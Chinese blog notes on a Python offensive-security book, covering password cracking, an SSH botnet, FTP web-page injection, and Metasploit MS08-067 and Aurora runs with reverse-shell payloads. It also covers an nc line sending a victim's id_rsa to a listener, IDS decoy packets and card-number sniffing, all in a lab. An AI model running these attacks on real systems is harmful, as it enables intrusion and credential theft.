标签：real   partner   mod   基础   shadow文件   final   计算机   fas   .com   

第一章——入门

1、准备开发环境

安装第三方库：

安装Python-nmap包：

wget http://xael.org/norman/python/python-nmap/pythonnmap-0.2.4.tar.gz-On map.tar.gz

tar -xzf nmap.tar.gz

cd python-nmap-0.2.4/

python setup.py install

当然可以使用easy_install模块实现更简便的安装：easy_install python-nmap

安装其他：easy_install pyPdf python-nmap pygeoip mechanize BeautifulSoup4

其他几个无法用easy_install命令安装的与蓝牙有关的库：apt-get install python-bluez bluetooth python-obexftp

Python解释与Python交互：

简单地说，Python解释是通过调用Python解释器执行py脚本，而Python交互则是通过在命令行输入python实现交互。

2、Python语言

变量

Python中的字符串、整形数、列表、布尔值以及词典。

字符串

四个方法：upper()大写输出、lower()小写输出、replace()替换、find()查找

List（列表）

append()方法向列表添加元素、index()返回元素的索引、remove()删除元素、sort()排序、len()返回列表长度

词典

keys()返回词典中所有键的列表、items()返回词典中所有项的完整信息的列表

网络

使用socket模块，connect()方法建立与指定IP和端口的网络连接；revc(1024)方法将读取套接字中接下来的1024B数据

条件选择语句

if 条件一:
语句一
elif 条件二:
语句二
else:
语句三

异常处理

try/except语句进行异常处理，可以将异常存储到变量e中以便打印出来，同时还要调用str()将e转换成一个字符串

函数

通过def()关键字定义，示例中定义扫描FTP banner信息的函数：

迭代

for语句

文件输入/输出

open()打开文件，r只读,r+读写,w新建(会覆盖原有文件),a追加,b二进制文件

同一目录中：

不同目录中：

从当前目录开始往下查找，前面加上.号

或者是绝对路径则不用加.号表示从当前目录开始

sys模块

sys.argv列表中含有所有的命令行参数，sys.argv[0]为Python脚本的名称，其余的都是命令行参数

OS模块

os.path.isfile()检查该文件是否存在

os.access()判断当前用户是否有权限读取该文件

整合

将上述各个模块整合起来，实现对目标主机的端口及其banner信息的扫描：

运行结果：

3、第一个Python程序

第一个程序：Unix口令破解机

这段代码通过分别读取两个文件，一个为加密口令文件，另一个为用于猜测的字典文件。在testPass()函数中读取字典文件，并通过crypt.crypt()进行加密，其中需要一个明文密码以及两个字节的盐，然后再用加密后的信息和加密口令进行比较查看是否相等即可。

先看crypt的示例：

可以看到盐是添加在密文的前两位的，所以将加密口令的前两位提取出来为salt即可。

运行结果：

在现代的类Unix系统中在/etc/shadow文件中存储了口令的hash，但是更多的是使用SHA-512等更安全的hash算法，如：

在Python中的hashlib库可以找到SHA-512的函数，这样就可以进一步升级脚本进行口令破解。

第二个程序：一个Zip文件口令破解机

主要使用zipfile库的extractall()方法，其中pwd参数指定密码

代码中导入了optparse库解析命令行参数，调用OptionParser()生成一个参数解析器类的示例，parser.add_option()指定具体解析哪些命令行参数，usage输出的是参数的帮助信息；同时也采用了多线程的方式提高破解速率。

运行结果：

第二章——用Python进行渗透测试

1、编写一个端口扫描器

TCP全连接扫描、抓取应用的Banner

这段代码实现了命令行参数输入，需要用户输入主机IP和扫描的端口号，其中多个端口号之间可以用,号分割开；若参数输入不为空时（注意检测端口参数列表不为空即检测至少存在第一个值不为空即可）则调用函数进行端口扫描；在portScan()函数中先尝试调用gethostbyname()来从主机名获取IP，若获取不了则解析IP失败程序结束，若成功则继续尝试调用gethostbyaddr()从IP获取主机名相关信息，若获取成功则输出列表的第一项主机名否则直接输出IP，接着遍历端口调用connScan()函数进行端口扫描；在connScan()函数中，socket方法中有两个参数AF_INET和SOCK_STREAM，分别表示使用IPv4地址和TCP流，这两个参数是默认的，在上一章的代码中没有添加但是默认是这两个参数，其余的代码和之前的差不多了。

注意一个小问题就是，设置命令行参数的时候，是已经默认添加了-h和--help参数来提示参数信息的，如果在host参数使用-h的话就会出现错误，因而要改为用大写的H即书上的“-H”即可。

运行结果：

线程扫描

将上一小节的代码修改一下，添加线程实现，同时为了让一个函数获得完整的屏幕控制权，这里使用一个信号量semaphore，它能够阻止其他线程运行而避免出现多线程同时输出造成的乱码和失序等情况。在打印输出前带调用screenLock.acquire()函数执行一个加锁操作，若信号量还没被锁定则线程有权继续运行并输出打印到屏幕上，若信号量被锁定则只能等待直到信号量被释放。

运行结果：

从结果可以看到，使用多线程之后端口的扫描并不是按输入的顺序进行的了，而是同时进行，但是因为有信号量实现加锁等操作所以输出的结果并没有出现乱码等情况。

使用nmap端口扫描代码

如果在前面没有下载该模块，则需要先到http://xael.org/pages/python-nmap-en.html中下载Python-Nmap

运行结果：

2、用Python构建一个SSH僵尸网络

用Pexpect与SSH交互

若在前面第一章的时候没有下载，则需要先下载Pexpect：https://pypi.python.org/pypi/pexpect/

Pexpect模块可以实现与程序交互、等待预期的屏幕输出并据此作出不同的响应。

先进行正常的ssh连接测试：

模仿这个流程，代码如下：

这段代码没有进行命令行参数的输入以及没有实现命令行交互。

运行结果：

书上提到了BackTrack中的运行，也来测试一下吧：

在BT5中生成ssh-key并启动SSH服务：

sshd-generate

service ssh start

./sshScan.py

【个人修改的代码】

这段代码可以进一步改进一下，下面的是个人改进的代码，实现了参数化输入以及命令行shell交互的形式：

这样就可以指定目标主机进行SSH连接并实现了SSH一样的命令行交互体验了：

用Pxssh暴力破解SSH密码

pxssh 是 pexpect 中 spawn 类的子类，增加了login()、logout()和prompt()几个方法，使用其可以轻松实现 ssh 连接，而不用自己调用相对复杂的 pexpect 的方法来实现。

prompt(self,timeout=20)方法用于匹配新提示符

使用pxssh替代上一小节的脚本：

一开始遇到一个问题，就是直接按书上的敲import pxssh会显示出错，但是明明已经安装了这个文件，查看资料发现是pxssh是在pexpect包中的，所以将其改为from pexpect import pxssh就可以了。

运行结果：

接着继续修改代码：

Semaphore，是一种带计数的线程同步机制，当调用release时，增加计算，当acquire时，减少计数，当计数为0时，自动阻塞，等待release被调用。其存在两种Semaphore， 即Semaphore和BoundedSemaphore，都属于threading库。

Semaphore:  在调用release()函数时，不会检查增加的计数是否超过上限（没有上限，会一直上升）

BoundedSemaphore：在调用release()函数时，会检查增加的计数是否超过上限，从而保证了使用的计数

运行结果：

利用SSH中的弱密钥

使用密钥登录ssh时，格式为：ssh user@host -i keyfile -o PasswordAuthentication=no

本来是要到这个网站中去下载ssh的私钥压缩包的：http://digitaloffense.net/tools/debianopenssl/

但是由于时间有点久已经没有该站点可以下载了。

为了进行测试就到靶机上将该ssh的rsa文件通过nc传过来：

Kali先开启nc监听：nc -lp 4444 > id_rsa

然后靶机Metasploitable进入ssh的dsa目录，将id_rsa文件而不是id_rsa.：

cd .ssh

nc -nv 10.10.10.160 4444 -q 1 < id_rsa

下面这段脚本主要是逐个使用指定目录中生成的密钥来尝试进行连接。

运行结果：

构建SSH僵尸网络

这段代码主要定义一个客户端的类实现ssh连接和发送命令，然后再定义一个botNet数组用于保存僵尸网络中的所有主机，并定义两个方法一个是添加僵尸主机的addClient()、 另一个为在僵尸主机中遍历执行命令的botnetCommand()。

运行结果：

【个人修改的代码】

接下来是本人修改的代码，先是将僵尸主机的信息都保存在一个文件中、以:号将三类信息分割开，从而脚本可以方便地通过读取文件中的僵尸主机信息，同时脚本也实现了批量命令行交互的形式，和之前修改的ssh命令行交互的形式差不多，只是每次输入一条命令所有的僵尸主机都会去执行从而返回命令结果：

botnet.txt文件：

botNet2.py：

这段修改的代码主要的处理问题是输出的问题，在代码注释中也说得差不多了，就这样吧。

运行结果：

用户可以将收集到的ssh僵尸主机都保存在botnet.txt文件中，这样脚本运行起来执行就会十分地方便、实现批量式的操作。

3、利用FTP与Web批量抓“肉机”

用Python构建匿名FTP扫描器

一些FTP服务器提供匿名登录的功能，因为这有助于网站访问软件更新，这种情况下，用户输入用户名“anonymous”并提交一个电子邮箱替代密码即可登录。

下面的代码主要是使用ftplib模块的FTP()、login()和quit()方法实现：

运行结果：

【个人修改的代码】

稍微修改了一下，实现命令行输入交互：

运行结果：

使用Ftplib暴力破解FTP用户口令

同样是通过ftplib模块，结合读取含有密码的文件来实现FTP用户口令的破解：

运行结果：

其中ftbBL.txt文件：

【个人修改的代码】

小改一下：

运行结果：

在FTP服务器上搜索网页

有了FTP服务器的登录口令之后，可以进行测试该服务器是否提供Web服务，其中检测通过nlst()列出的每个文件的文件名是不是默认的Web页面文件名，并把找到的所有默认的网页都添加到retList数组中：

运行结果：

【个人修改的代码】

运行结果：

在网页中加入恶意注入代码

这里主要提及利用之前的极光漏洞，先在Kali中打开Metasploit框架窗口，然后输入命令：

search ms10_002_aurora

use exploit/windows/browser/ms10_002_aurora

show payloads

set payload windows/shell/reverse_tcp

show options

set SRVHOST 10.10.10.160

set URIPATH /exploit

set LHOST 10.10.10.160

set LPORT 443

exploit

运行之后，分别在win 2k3 server和XP上访问http://10.10.10.160:8080/exploit 站点，虽然得到了连接信息但是没有得到shell，可能是因为IE浏览器的版本不存在极光漏洞吧：

过程清晰之后，就实现往目标服务器的网站文件中注入访问http://10.10.10.160:8080/exploit的代码即可，整个代码如下：

运行结果：

显示下载页面、注入恶意代码、上传都成功，到服务器查看相应的文件内容，发现注入成功了：

接下来的利用和本小节开头的一样，直接打开msf进行相应的监听即可。

【个人修改的代码】

运行结果：

整合全部的攻击

这里将上面几个小节的代码整合到一块，主要是添加了attack()函数，该函数首先用用户名和密码登陆FTP服务器，然后调用其他函数搜索默认网页并下载同时实现注入和上传，其实说白了这个函数就是将前面几个小节的函数整合起来调用。

运行结果：

由于可以匿名登录所以可以直接进行注入攻击。

【个人修改的代码】

但是发现就是匿名登录进去的文件都只是属于匿名用户自己的而没有ftpuser即正常的FTP用户的文件，所以为了实现同时进行注入就稍微修改了一下代码：

运行结果：

可以发现两个用户中发现的文件是不一样的。

4、Conficker，为什么努力做就够了

在密码攻击的口令列表中值得拥有的11个口令：

aaa

academia

anything

coffee

computer

cookie

oracle

password

secret

super

unknown

使用Metasploit攻击Windows SMB服务

这里主要利用了MS08-067的这个漏洞来进行演示

将下面的命令保存为conficker.rc文件：

use exploit/windows/smb/ms08_067_netapi

set RHOST 10.10.10.123

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 10.10.10.160

set LPORT 7777

exploit -j -z

这里exploit命令的-j参数表示攻击在后台进行，-z参数表示攻击完成后不与会话进行交互。

接着输入命令：msfconsole -r conficker.rc

获得一个会话session1之后，然后打开这个session：

这样就能通过打开文件读取其中命令的方式来执行msf相应的操作，从而获取了XP的shell。

编写Python脚本与Metasploit交互

导入nmap库，在findTgts()函数中实现对整个网段的主机445端口的扫描，setupHandler()函数实现目标主机被攻击后进行远程交互的监听器的功能，confickerExploit()函数实现上一小节中conficker.rc脚本中一样的内容：

注意点就是，在confickerExploit()函数中，脚本发送了一条指令在同一个任务（job）的上下文环境中（-j），不与任务进行即时交互的条件下（-z）利用对目标主机上的漏洞。因为这个脚本是实现批量式操作的，即会渗透多个目标主机，因而不可能同时与各个主机进行交互而必须使用-j和-z参数。

暴力破解口令，远程执行一个进程

这里暴力破解SMB用户名/密码，以此来获取权限在目标主机上远程执行一个进程（psexec），将用户名设为Administrator，然后打开密码列表文件，对文件中的每个密码都会生成一个远程执行进行的Metasploit脚本，若密码正确则会返回一个命令行shell：

把所有的代码放在一起，构成我们自己的Conficker

运行结果：

5、编写你自己的0day概念验证代码

添加攻击的关键元素：

首先在shellcode变量中写入msf框架生成的载荷和十六进制代码；然后在overflow变量中写入246个字母A（十六进制值为\x41），接着让ret变量指向kernel32.dll中的一个含有把控制流直接跳转到栈顶部的指令的地址；padding变量中是150个NOP指令，构成NOP链；最后把所有变量组合在一起形成crash变量：

其中padding为在shellcode之前的一系列NOP（无操作）指令，使攻击者预估直接跳转到那里去的地址时，能放宽的精度要求。只要它跳转到NOP链的任意地方，都会直接滑到shellc中去。

发送漏洞利用代码：

使用socket与目标主机的TCP 21端口创建一个连接，若连接成功则匿名登录主机，最后发送FTP命令RETR，其后面接上crash变量，由于受影响的程序无法正确检查用户输入，因而会引发基于栈的缓冲区溢出，会覆盖EIP寄存器从而使程序直接跳转到shellcode中并执行：

汇总得到完整的漏洞利用脚本：

需要下载能运行在XP上的FreeFloat FTP软件，然后就可以进行测试了：

第三章——用Python进行取证调查

1、你曾经去过哪里？——在注册表中分析无线访问热点：

以管理员权限开启cmd，输入如下命令来列出每个网络显示出profile Guid对网络的描述、网络名和网关的MAC地址：

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\NetworkList\Signatures\Unmanaged" /s

使用WinReg读取Windows注册表中的内容：

这里需要用到Python的_winreg库，在Windows版是默认安装好的。

连上注册表后，使用OpenKey()函数打开相关的键，在循环中依次分析该键下存储的所有网络network profile，其中FirstNetwork网络名和DefaultGateway默认网关的Mac地址的键值打印出来。

运行结果：

注意一点的是，是需要管理员权限开启cmd来执行脚本才行得通。

使用Mechanize把Mac地址传给Wigle：

此处增加了对Wigle网站的访问并将Mac地址传递给Wigle来获取经纬度等物理地址信息。

运行结果：

看到只显示一条信息，且没有其物理地址相关信息，存在问题。

调试查看原因：

发现是网站的robots.txt文件禁止对该页面的请求因而无法访问。

2、用Python恢复被删入回收站中的内容：

使用OS模块寻找被删除的文件/文件夹：

Windows系统中的回收站是一个专门用来存放被删除文件的特殊文件夹。

子目录中的字符串表示的是用户的SID，对应机器里一个唯一的用户账户。

寻找被删除的文件/文件夹的函数：

用Python把SID和用户名关联起来：

可以使用Windows注册表把SID转换成一个准确的用户名。

以管理员权限运行cmd并输入命令：

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2595130515-3345905091-1839164762-1000" /s

代码如下：

回收站的内容：

运行结果：

3、元数据：

使用PyPDF解析PDF文件中的元数据：

pyPdf是管理PDF文档的第三方Python库，在Kali中是已经默认安装了的就不需要再去下载安装。

解析一个PDF文件的运行结果：

理解Exif元数据：

Exif，即exchange image file format交换图像文件格式，定义了如何存储图像和音频文件的标准。

用BeautifulSoup下载图片：

用Python的图像处理库读取图片中的Exif元数据：

这里使用到Python的图形处理库PIL，在Kali中默认安装了。

这里查看下载图片的元数据中是否含有Exif标签“GPSInfo”，若存在则输出存在信息。

书中样例的网址为https://www.flickr.com/photos/dvids/4999001925/sizes/o

运行结果：

4、用Python分析应用程序的使用记录：

使用Python和SQLite3自动查询Skype的数据库：

这里没有下载Skype聊天程序，感兴趣的自己下载测试即可。

这里直接用该书作者提供的数据包进行测试：

用Python解析火狐浏览器的SQLite3数据库：

在Windows7以上的系统中，Firefox的sqlite文件保存在类似如下的目录中：C:\Users\win7\AppData\Roaming\Mozilla\Firefox\Profiles\8eogekr4.default

主要关注这几个文件：cookie.sqlite、places.sqlite、downloads.sqlite

然而在最近新的几个版本的Firefox中已经没有downloads.sqlite这个文件了，具体换成哪个文件可以自己去研究查看一下即可。

上述脚本对原本的脚本进行了一点修改，修改的地方是对查找Google搜索记录部分改为对查找Baidu搜索记录，这样在国内更普遍使用~

运行结果：

除了downloads.sqlite文件找不到外，其他的文件都正常解析内容了。在查找搜索内容部分，若为中文等字符则显示为编码的形式。

5、用Python调查iTunes的手机备份：

没有iPhone  :-)     ，有的自己测试一下吧 。

第四章——用Python分析网络流量

1、IP流量将何去何从？——用Python回答：

使用PyGeoIP关联IP地址和物理地址：

需要下载安装pygeoip，可以pip install pygeoip或者到Github上下载安装https://github.com/appliedsec/pygeoip

同时需要下载用pygeoip操作的GeoLiteCity数据库来解压获得GeoLiteCity.dat数据库文件：

http://dev.maxmind.com/geoip/legacy/geolite/

将GeoLiteCity.dat放在脚本的同一目录中直接调用即可。

运行结果：

使用Dpkt解析包：

需要安装dpkt包：pip install dpkt

dpkt允许逐个分析抓包文件里的各个数据包，并检查数据包中的每个协议层。

因为抓取的流量不多，直接使用书上的数据包来测试即可：

接着添加retGeoStr()函数，返回指定IP地址对应的物理位置，简单地解析出城市和三个字母组成的国家代码并输出到屏幕上。整合起来的代码如下：

还是使用之前测试用的数据包：

使用Python画谷歌地图：

这里修改一下代码，将kml代码直接写入一个新文件中而不是直接输出到控制台。

运行结果：

查看该kml文件：

接着访问谷歌地球：https://www.google.com/earth/

在左侧选项中导入kml文件：

导入后点击任一IP，可以看到该IP地址的定位地图：

2、“匿名者”真能匿名吗？分析LOIC流量：

LOIC，即Low Orbit Ion Cannon低轨道离子炮，是用于压力测试的工具，通常被攻击者用来实现DDoS攻击。

使用Dpkt发现下载LOIC的行为：

一个比较可靠的LOIC下载源：https://sourceforge.net/projects/loic/

由于下载源站点已从HTTP升级为HTTPS，即已经无法直接通过抓包来进行请求头的分析了。

这里直接使用书上提供的数据包进行测试：

解析Hive服务器上的IRC命令：

下面的代码主要用于检测僵尸网络流量中的IRC命令：

同样直接用案例的数据包来测试：

实时检测DDoS攻击：

主要通过设置检测不正常数据包数量的阈值来判断是否存在DDoS攻击。

同样直接用案例的数据包来测试：

然后将前面的代码整合到一起：

由于这部分作者没有给示例数据包，那就自己来合并上述几个pcap文件，使用命令：

mergecap -a -F pcap -w traffic.pcap download.pcap hivemind.pcap attack.pcap

-a参数指定按照命令顺序来合并各个pcap文件（不添加-a参数则默认按照时间的顺序合并），-F参数指定生成的文件类型，-w参数指定生成的pcap文件。

运行结果：

3、H.D.Moore是如何解决五角大楼的麻烦的：

理解TTL字段：

TTL即time-to-live，由8比特组成，可以用来确定在到达目的地之前数据包经过了几跳。当计算机发送一个IP数据包时会设置TTL字段为数据包在到达目的地之前所应经过的中继跳转的上限值，数据包每经过一个路由设备，TTL值就自减一，若减至0还未到目的地，路由器会丢弃该数据包以防止无限路由循环。

Nmap进行伪装扫描时，伪造数据包的TTL值是没有经过计算的，因而可以利用TTL值来分析所有来自Nmap扫描的数据包，对于每个被记录为Nmap扫描的源地址，发送一个ICMP数据包来确定源地址与目标机器之间隔了几跳，从而来辨别真正的扫描源。

Nmap的-D参数实现伪造源地址扫描：nmap 192.168.220.128 -D 8.8.8.8

Wireshark抓包分析，加上过滤器的条件“ip.addr==8.8.8.8”，发现确实是有用伪造源地址进行扫描：

点击各个数据包查看TTL值：

可以看到默认扫描的Nmap扫描，其ttl值是随机的。

添加-ttl参数指定值为13之后，可以看到发送的数据包的ttl值都为13：

用Scapy解析TTL字段的值：

这里使用Scapy库来获取源地址IP及其TTL值。

运行脚本监听后，启动Nmap伪造源地址扫描即可看到如下结果：

接着添加checkTTL()函数，主要实现对比TTL值进行源地址真伪判断：

运行脚本监听后，启动Nmap伪造源地址扫描即可看到如下结果：

4、“风暴”（Storm）的fast-flux和Conficker的domain-flux：

你的DNS知道一些不为你所知的吗？

下面用nslookup命令来进行一次域名查询：

Wireshark抓包如下：

可以看到客户端发送DNSQR请求包，服务器发送DNSRR响应包。

使用Scapy解析DNS流量：

一个DNSQR包含有查询的名称qname、查询的类型qtype、查询的类别qclass。

一个DNSRR包含有资源记录名名称rrname、类型type、资源记录类别rtype、TTL等等。

用Scapy找出fast-flux流量：

解析pcap文件中所有含DNSRR的数据包，提取分别含有查询的域名和对应的IP的rrname和rdata变量，然后建立一个索引字典并对字典中未出现的IP添加到数组中。

用书上的数据包进行测试：

用Scapy找出Domain Flux流量：

通常，Conficker会在感染的几小时内生成许多DNS域名，但很多域名都是假的，目的是为了掩盖真正的命令与控制服务器，因而需要寻找的就是那些对未知域名查询回复出错信息的服务器响应包。

这里只检查服务器53端口的数据包，DNS数据包有个rcode字段，当其值为3时表示域名不存在。

书上示例数据包测试结果：

5、Kevin Mitnick和TCP序列号预测：

预测你自己的TCP序列号：

TCP序列号预测利用的是原本设计用来区分各个独立的网络连接的TCP序列号的生成缺乏随机性这一缺陷。

使用Scapy制造SYN洪泛攻击：

使用Scapy制造一些再有TCP协议层的IP数据包，让这些包TCP源端口不断地自增一，而目的TCP端口513不变。

先确认目标主机开启了513端口，然后进行SYN洪泛攻击：

运行结果：

计算TCP序列号：

主要通过发送TCP SYN数据包来从依次收到的SYN/ACK包中计算TCP序列号之差，查看是否存在可被猜测的规律。

运行结果：

应该是存在问题的，修改一下输出看看：

可以看到preNum的值都为0，应该是代码中的逻辑出现问题了。

稍微修改一下代码：

运行结果：

可以看到，TCP序列号结果是随机的，即目标主机不存在该漏洞。

伪造TCP连接：

添加伪造TCP连接的spoofConn()函数，整合为一体，主要过程为先对远程服务器进行SYN洪泛攻击、使之拒绝服务，然后猜测TCP序列号并伪造TCP连接去跟目标主机建立TCP连接。

这里的代码只是简单实现了当时实现攻击的场景，现在由于TCP序列号的随机性已经比较难进行TCP猜测攻击了。

运行结果：

测试时直接将发包数量设置小一点从而更好地看到输出结果。

6、使用Scapy愚弄入侵检测系统：

这里IDS使用的是snort，本小节主要是通过分析snort的规则，制造假的攻击迹象来触发snort的警报，从而让目标系统产生大量警告而难以作出合理的判断。

先来查看snort的ddos规则：

vim /etc/snort/rules/ddos.rules

然后输入：/icmp_id:678 来直接查找

看到可以利用的触发警报的规则DDoS TFN探针：ICMP id为678，ICMP type为8，内容含有“1234”。其他的特征也按照规则下面的构造即可。只要构造这个ICMP包并发送到目标主机即可。

运行结果：

检查snort警报日志，可以看到四个数据包都被IDS检测到并产生了警报：

snort -q -A console -i eth2 -c /etc/snort/snort.conf

输入上述命令查看日志期间可能会报错，如：

ERROR: /etc/snort/rules/community-smtp.rules(13) => !any is not allowed

ERROR: /etc/snort/rules/community-virus.rules(19) => !any is not allowed

这时就输入命令：vim /etc/snort/snort.conf，注释掉/etc/snort/rules/community-smtp.rules 和 /etc/snort/rules/community-virus.rules所在行即可。

再来查看snort的exploit.rules文件中的警报规则：

vim /etc/snort/rules/exploit.rules

然后输入：/EXPLOIT ntalkd x86 Linux overflow 来查找

可以看到，含有框出的指定字节序列就会触发警报。

为了生成含有该指定字节序列的数据包，可以使用符号\x，后面跟上该字节的十六进制值。注意的是其中的“89|F|”在Python中写成“\x89F”即可。

接着伪造踩点或扫描的操作来触发警报。

查看snort的exploit.rules文件中的警报规则：

vim /etc/snort/rules/scan.rules

然后输入：/Amanda 来查找

可以看到，只要数据包中含有框出的特征码即可触发警报。

现在整合所有的代码，生成可以触发DDoS、exploits以及踩点扫描警报的数据包：

-s参数指定发送的源地址，这里伪造源地址为1.2.3.4，-c参数指定发送的次数、只是测试就只发送一次即可。

运行结果：

可以看到，一共发送了8个数据包。

切换到目标主机的snort进行警报信息查看，可以看到，触发了8条警报，且源地址显示的是伪造的IP：

第五章——用Python进行无线网络攻击

本章大部分代码都是实现了但是缺乏相应的应用环境，想具体测试的可以直接找到对应的环境或者自行修改脚本以适应生活常用的环境。

1、搭建无线网络攻击环境：

用Scapy测试无线网卡的嗅探功能：

插入无线网卡，输入iwconfig命令查看网卡信息：

将可能会影响进行无线实验的因素排除掉，然后将网卡设置为混杂模式：

确认进入Monitor模式：

测试嗅探无线网络的代码：

运行结果：

安装Python蓝牙包：

apt-get update

apt-get install python-bluez bluetooth python-boexftp

另外还需要一个蓝牙设备，测试能否识别该设备：hciconfig

由于本人没有蓝牙设备，蓝牙部分就先不进行测试。

2、绵羊墙——被动窃听无线网络中传输的秘密：

使用Python正则表达式嗅探信用卡信息：

这里主要搜找书上所列的3种常用的信用卡：Visa、MasterCard和American Express。

测试代码：

运行结果：

接着就加入Scapy来嗅探TCP数据包实现嗅探功能：

运行结果：

当然并没有这几种信用卡，而且在本地不常见。具体其他信用卡号的规律可以自己发掘一下。

嗅探宾馆住客：

这段脚本所在的网络环境是作者所在宾馆的环境，不同环境肯定有区别，可以自行抓包修改脚本实现嗅探。

当然没有嗅探出信息：

编写谷歌键盘记录器：

Google搜索，由“q=”开始，中间是要搜索的字符串，并以“&”终止，字符“pg=”后接的是上一个搜索的内容。

嗅探不到什么结果的就不给出截图了，后面部分也一样。

嗅探FTP登录口令：

3、你带着笔记本电脑去过哪里？Python告诉你：

侦听802.11 Probe请求：

寻找隐藏网络的802.11信标：

找出隐藏的802.11网络的网络名：

本章后面的代码实用性不高，暂时也不贴该块的代码了，也没有测试的环境。

第六章——用Python刺探网络

1、使用Mechanize库上网：

Mechanize库的Browser类允许我们对浏览器中的任何内容进行操作。

运行结果：

匿名性——使用代理服务器、User-Agent和cookie：

书上是从http://www.hidemyass.com/中获取的一个代理IP，且在http://ip.ntfsc.noaa.gov/中显示的当前IP来测试代理IP是否可用。但是以上两个网址正常都访问不了，那就直接用国内访问得了的吧，具体的可参考《Python爬虫之基础篇》中的代理IP部分。

为了方便，直接上之前的脚本找找看哪些代理IP可用，有个注意的地方就是查看当前IP的网址变为http://2017.ip138.com/ic.asp，之前的那个现在是查看CDN节点IP的了。

agentIP.py的运行结果：

直接找显示可行的那个代理IP下来，编写使用Mechanize验证代理IP的脚本：

运行结果：

可用看到，页面显示的IP地址确实是代理的IP地址。

另外还要添加User-Agent的匿名，在http://www.useragentstring.com/pages/useragentstring.php中有很多版本的UA提供。另外，该页面http://whatismyuseragent.dotdoh.com提供将UA显示在页面的功能，但现在已经用不了了。还是写上书上的源代码：